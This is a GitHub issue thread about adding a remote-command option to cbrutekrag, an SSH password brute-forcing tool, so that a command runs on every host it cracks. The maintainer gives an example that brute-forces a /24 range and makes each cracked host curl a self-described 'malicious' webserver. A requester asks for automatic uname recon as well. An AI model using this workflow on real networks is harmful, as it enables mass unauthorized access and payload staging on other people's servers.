### ISSUE TITLE
const char *commandline = command;

### ISSUE THREAD

**Issue by metadone666** [matricali/cbrutekrag#3]
It would be damn awesome if we can have -exec line in cbrutekrag

const char *commandline = command; (ex: -cmd -exec)

**Comment by metadone666** [comment]
i guess it looks like 
f(enabled_sem) sem_wait(&semaphore);
                cout << "thread-id:"<<index<<" counter-user:"<<counter_name<<" counter-pwd:"<<counter_pwd
                <<" cmd:[" <<"sshpass -p '"+lpasswd[counter_pwd]+"' ssh "+lname[counter_name]+"@"+host+" -p "+port<<" "<<command<<"]"<<endl;
                ssh(lname[counter_name], host, lpasswd[counter_pwd], port, command);
                counter_pwd++;
if(counter_pwd>=lpasswd.size())

**Comment by matricali** [comment]
cbrutekrag uses [libssh](https://libssh.org), so the correct way to execute remote commands will be something like this:
- First create a channel
- Open a session
- Then send command using `ssh_channel_request_exec`

**Comment by metadone666** [comment]
"cbrutekrag uses libssh, so the correct way to execute remote commands will be something like this:

    First create a channel
    Open a session
    Then send command using ssh_channel_request_exec "

So, it means you cannot execute a remote command directly from the main running command ?
so all of this would look like
cbrutekrag arg arg arg -execute -rm etc... arg -p 22 ?  i wrote arg as an example of options.

the main thing i'm interested in,  is to execute a remote command directly from cbrutekrag . i'm waiting with my fingers crossed :D thanks a million !

**Comment by metadone666** [comment]
In any case, can you give me an example of this please ? let's pretend we want to scan some servers but also we want to execute a command in the same time with cbrutekrag and apply for the servers it scans.
Thank you !
    On Wednesday, September 18, 2019, 02:43:31 AM GMT+3, Jorge Matricali <notifications@github.com> wrote:  
 
 
cbrutekrag uses libssh, so the correct way to execute remote commands will be something like this:
   
   - First create a channel
   - Open a session
   - Then send command using ssh_channel_request_exec

**Comment by matricali** [comment]
I will work on it. But, it isn't the main purpose of this tool.
I wrote this tool to help to test ssh servers against weak passwords, no more.

**Comment by metadone666** [comment]
> I will work on it. But, it isn't the main purpose of this tool.
> I wrote this tool to help to test ssh servers against weak passwords, no more.

It's ok :) . The main reason I / we ask you for this upgrade is to test our servers agains ssh / remote attacks. As we traveled over the internet, we found cbrutekrag, which is the most acurate bf atm.
We've managed to secure ourselves agains TSM,ANCKOn , etc.
Upgrading remote cmd option, will help testing all the vulnerabilities in 1 command.
Thanks a million !

**Comment by matricali** [comment]
I've been committed these changes to "feature/remote-command-execution" branch.
Can you test it and give me feedback?

Thanks in advance

**Comment by metadone666** [comment]
I'm more then grateful for your drive and knowledge ! I'll try it in a moment !

**Comment by metadone666** [comment]
Ok, sorry for delay, for some reasons it's not working,  keep getting errors when i do "make".
I've replaced the mod files but there's errors like 
"brutekrag.c:191:17: warning: implicit declaration of function ‘waitpid’ [-Wimplicit-function-declaration]
  191 |                 waitpid(-1, NULL, 0);
      |                 ^~~~~~~
cbrutekrag.c:225:1: error: expected declaration or statement at end of input
  225 | }
      | ^
make: *** [<builtin>: cbrutekrag.o] Error 1
"

**Comment by metadone666** [comment]
Ok, i made all the tests but the -x command isn't actually working. It looks like it's working but won't execute the command.

**Comment by matricali** [comment]
The command is executed on the remote host but doesn't read the response, because I've implements only the send, but not the receive.
Can you send me via email some examples of parameters that you've used?

**Comment by matricali** [comment]
> Ok, i made all the tests but the -x command isn't actually working. It looks like it's working but won't execute the command.

Note that you must use -X (uppercase) as argument

**Comment by metadone666** [comment]
> @metadone666 You're sure about the command isn't executed?
> I think that the command is executed on the remote host but doesn't reads the response, because I've implements only the send, but not yet the receive.
> Can you send me via email some examples of parameters that you've used?
> 
> I've tried something like this:
> `cbrutekrag -sp 2222 -t 12 -X 'curl http://192.168.100.6/test.txt' 192.168.100.0/24` (Where 192.168.100.6 is a "malicious" webserver, and 192.168.100.0/24 the range where we will look for SSH servers listening on port 2222)
> Then, I've noticed that the request is present on webserver's access log, so I've deducted that the command has worked.
> I've not tested yet with long-running commands or scripts.

Hello, brother !
I've sent you an email with an example of parameters i've used with cbrutekrag.
Thank you for your focus !

**Comment by metadone666** [comment]
> > @metadone666 You're sure about the command isn't executed?
> > I think that the command is executed on the remote host but doesn't reads the response, because I've implements only the send, but not yet the receive.
> > Can you send me via email some examples of parameters that you've used?
> > I've tried something like this:
> > `cbrutekrag -sp 2222 -t 12 -X 'curl http://192.168.100.6/test.txt' 192.168.100.0/24` (Where 192.168.100.6 is a "malicious" webserver, and 192.168.100.0/24 the range where we will look for SSH servers listening on port 2222)
> > Then, I've noticed that the request is present on webserver's access log, so I've deducted that the command has worked.
> > I've not tested yet with long-running commands or scripts.
> 
> Hello, brother !
> I've sent you an email with an example of parameters i've used with cbrutekrag.
> Thank you for your focus !

Also, there's a small upgrade that would be awesome. if there's is any possibility to add the option "uname" as -a or -u so it will automatically do the uname and -X will be an optional
